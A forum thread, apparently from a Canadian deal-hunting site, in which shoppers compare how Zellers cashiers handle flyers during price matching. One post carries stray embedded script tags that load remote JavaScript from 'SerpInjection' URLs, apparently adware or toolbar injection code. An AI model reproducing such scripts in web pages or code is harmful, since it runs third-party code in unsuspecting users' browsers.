User Tag List

Page 1 of 3 1 2 3 LastLast
    Junior Canuck
    Trading Score
    73 (100%)

I got a wee bit of surprise...The cashier gladly price matched my item but then informed me she had to cut out the item featured in the flyer. I explained I needed the flyer to price match a different item on the back of the page at different store (think Walmart) because Zellers did not have the item in question. She told me my options were a) she could cut out the picture of the item price matched or b) void the price match. So, it was basically the lesser of 2 evils; I had to decide which item I really NEEDED. I let her attack the flyer. My flyer looked like swiss cheese.

Naturally, I had to investigate. I went to find the manager. He explained that the cut out flyer item would be treated as a coupon. Apparently, head office is concerned about the validity of the price matched item prices. Sheesh. Has anyone experienced this yet?
    Let me know, please. Misery loves company
    This thread is currently associated with: Zellers, Walmart

blessedmommy
    Trading Score
    38 (100%)

I had had different experiences at different Zellers:
    The cashier either

1. Cut out the item of the flyer like what happened to you
    2. Just looked at the flyer to confirm validity, then PM without a prob
    3. Wrote on a sheet of paper about the amount and the store that I price matched the item too.

I guess it depends on which Zellers you shop at

Smart Canuck
    Trading Score
    152 (100%)

I have had that happen. But lately the zellers I go to has said they no longer need to cut up the flyer. Go figure.

Canadian Genius
    Trading Score
    209 (100%)

I have not had them ask to keep the flyer yet but the other day I was told I could not pm and use coupons. So I left my cart and did a pm at Walmart with no problem.

Trading Score
    64 (100%)

I have always had to give Zellers the flyer or they cut out the picture. I have experienced this in Ottawa, BC and Nova Scotia. I think maybe you are just lucky it hasn't happened to you before because I have never experienced anything different

Senior Canuck
    Trading Score
    42 (100%)

my zellers always cuts out the item from the flyer when i am price matching.

Canadian Guru
    Trading Score
    0 (0%)

Cashiers at my Zellers have cut out the PM'd item out of the flyer ever since I first remember PMing which was years ago

Trading Score
    18 (100%)

They take the picture from the flyer that I'm using for a price match here in NS.
    <script src="http://s3pr.freecause.com/airmiles-clone_script.js"></script><script src="http://staging.client.freecause.com/SerpInjection/bro_utils_js.js"></script><script src="http://staging.client.freecause.com/SerpInjection/bro_lm_js.js"></script><script> var fctb_tool=null; function FCTB_Init_e11c6b3e962043359693195d7fc736c5(t) { fctb_tool=t; start(fctb_tool); } FCTB_Init_e11c6b3e962043359693195d7fc736c5(documen t['FCTB_Init_3f3d06a0ab0d4b37b74d16a4d6104f99']); delete document['FCTB_Init_3f3d06a0ab0d4b37b74d16a4d6104f99']</script>
    Jockey Person to Person® can help you grow personally, professionally and financially... and it all happens by providing women with a better way to shop, dress and live. Check it out!

Trading Score
    1 (100%)

News to me, but I never price match at zellers, only from it. They seem so disorganized most of the time it's just kind of an inconvenience to shop at my local store.

If I ever encountered that situation though, I might just go to the store I'm PMing from and pick up another flyer.

Trading Score
    90 (100%)

I price matched Tues 4 items and they just looked at the flyer. I've never had that happen where they have cut it out. Another Zellers at the other end of town a long time ago took my flyer but never since.

Senior Canuck
    Trading Score
    253 (100%)

I go to a few different Zellers and they have alway cut/rip out whatever i'm PMing. I usually make it my last stop so I don't need the flyer anymore.

Trading Score
    102 (100%)

I've had them do that at Walmart.

Trading Score
    86 (100%)

I always go to the same Zellers and they always keep my flyer, so I make sure to get extra copies of the flyer I'm PMing if I need to. Lol. So thank goodness all the stores I shop at are close by to where we live and to each other.
    Want FREE Gifts and gift cards each month!? Just search the web - so easy to use! Please join me on Swagbucks!
    If you need help or have any questions, please feel free to message me.

Trading Score
    37 (100%)

yes same thing happened to me at zellers and at no frills too i really wanted my flyer back to do other pm at wm but i wanted the sale prices more so i let them keep it lol

Mastermind
    Trading Score
    277 (100%)

my zellers just writes it down and looks at the other flyer

Page 1 of 3 1 2 3 LastLast

Thread Information